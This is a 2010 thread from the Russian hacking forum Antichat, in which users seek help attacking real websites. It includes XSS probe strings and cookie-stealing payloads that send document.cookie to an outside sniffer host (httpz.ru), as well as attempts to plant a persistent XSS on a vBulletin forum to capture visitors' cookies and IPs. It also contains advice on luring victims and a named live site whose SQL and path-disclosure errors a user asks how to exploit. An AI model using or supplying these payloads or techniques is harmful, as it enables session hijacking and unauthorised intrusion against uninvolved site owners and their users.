ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Вопросы по уязвимостям (https://forum.antichat.xyz/showthread.php?t=8037122)

stan_q 30.09.2010 01:00

Предлагаю сделать небольшую объединяющую тему для разбора реальных уязвимостей, будь sqli, xss, инклуды и т.п.

Если выкладываете ссылку на сайт, делайте хайд, чтобы она не индексировалась. Ну и максимально полное описание проблемы + четко сформулированный вопрос. Перед тем, как задать вопрос, прошу пользоваться гуглом и поиском по форуму, чтобы не спрашивать дважды, а то и трижды одно и то же.

Norton710 09.10.2010 01:00

Вобщем проблемма такая) Нашел уязвимость на рандомном сайте

Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



alert('') выполняется при вводе

code:

'>">alert(/XSS/)

в строку поиска или в адресную строку.

Но на этом всё и закончилось, ибо как я не пытался вбить туда скрипт под HPС Снифф, он не выполняется..

Сообственно тело скрипта

code:

">
img = new Image(); img.src = "Адресс снифа"+document.cookie;

Вполне вероятно, что у меня просто неправильное представление о выполнее XSS кода.. Если это так и есть, то ткните, где именно я туплю) буду очень благодарен =)

p.s. сайт не имеет пользовательской авторизации. Но IP и тип браузера на снифф отсылаться-то вроде должны?..

stan_q 09.10.2010 01:00

Срабатывает так:

Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



Используй код для пассивной атаки из настроек нашего снифера

Norton710 09.10.2010 01:00

stan_q, да, так прокатило =) спасибо большое))

тогда по теме еще один вопрос, возможно ли запускать этот скрипт через результат поиска по сайту (если XSS в поисковике, а адресная строка без уязвимостей)

Я так понимаю, если alert прокатывает, значит сайт пропускает . А если сайт пропускает скрипт, то можно вбить его в поисковик и в обновлённой странице в исходном коде будет целый и невредимый скрипт.. Тоесть при заходе юзера на ссылку с результатом поиска, при загрузке страницы этот скрипт будет выполняться. Я правильно понимаю?)

stan_q 09.10.2010 01:00

Да, если alert срабатывает, то скрипт не фильтрует вводимые данные. Но если запрос передается через POST-запрос, то для эксплуатации надо будет применять разные методы, чтобы заставить жертву выполнить нужный тебе запрос. Т.е. чтобы жертва сама ввела в поиск вредноносный код и нажала энтер для его выполнения. Поправьте меня, если я ошибаюсь.

[offtop] Мой 1000-й пост [/offtop]

Norton710 09.10.2010 01:00

stan_q, Post запросы, вроде как, идут только на ресурсах с коментариями и заливкой файлов. И то, только в части сайта.. Другая часть сайта работает по обычному принципу

Если фильтр изменяет символы
code:

"

, еще есть шанс замутить активную XSS или только пасивную?

В разных частях сайта запросы выполняются по разному или везде один фильтр? тоесть если на всех страницах сайта Alert не канает, возможно ли существование такого отдела сайта, где скрипт запустится? или фильтр работает по всему сайту?

p.s. Гц с юбилейным постом =)

Norton710 13.10.2010 01:00

Столкнулся с такой проблеммой:
На одном форуме нашел возможность добавление

code:

[JPG][/JPG]

Добавил картинку со сниффера - прокатило, и он даже IP пользователей ловит =)
Дальше пробовал поставить Пробел после ссылки на картинку и опять всё отлично =)
Но при попытке вставить Java код, а точнее

code:

http://httpz.ru/картинка dynsrc=javascript:document.write('img = new Image(); img.src = "http://httpz.ru/сниффер?"+document.cookie;')

картинка убивается и на её месте пустое место.
Собственно вопрос - Если такая фигня, активная XSS еще возможно? или полностью отпадает?

p.s Пробовал lowsrc и перестановку Java скрипта.. Картинка всё так же не читается)

p.s.s. Вот всё, что известно мне о сайте.
1)Форум стоит на булке v4.0.0
2)Фильтратор изменяет такие символы, как и "
3)Перевод скриптов в Hex и Юник делают скрипт нечитаемым (хотя он остаётся целым)

Что можно еще попробовать сделать с скриптом?) Интересны все предложения =)

M@ZAX@KEP 15.10.2010 01:00

Цитата:


Что можно еще попробовать сделать с скриптом?



HTML highlight

где http://www.qweqw.ru/1.jpg - адрес отображаемой картинки

Norton710 15.10.2010 01:00

M@ZAX@KEP, не прокатило.. картинка не запустилась ни в одном случае)

lesha_firs 16.10.2010 01:00

Такой вопрос!
Вот сайт
http://teploe-okno.ru/page.php?pid=-1

возврашает 2 ошибки одна в левом столбце это sql ошибка! до неё я не смог добраться((
а внизу перед footer возникает такая ошибка

code:

Warning: is_dir() [function.is-dir]: open_basedir restriction in effect. File(/var/www/vhosts/teploe-okno.ru/httpdocs/hpics/1/) is not within the allowed path(s): (/home/users2/k/karakovski/:/usr/local/lib/php/:/tmp/) in /home/users2/k/karakovski/domains/teploe-okno.ru/page.php on line 31

как я знаю is_dir()
булевая функция опредиляюшие евляеться ли файл дирикторией!

Вот у меня вопрос это значит что файл подгружаеться из дериктории get параметром??
если да то что можно сделать??
и вообще что можно сделать?


Время: 09:31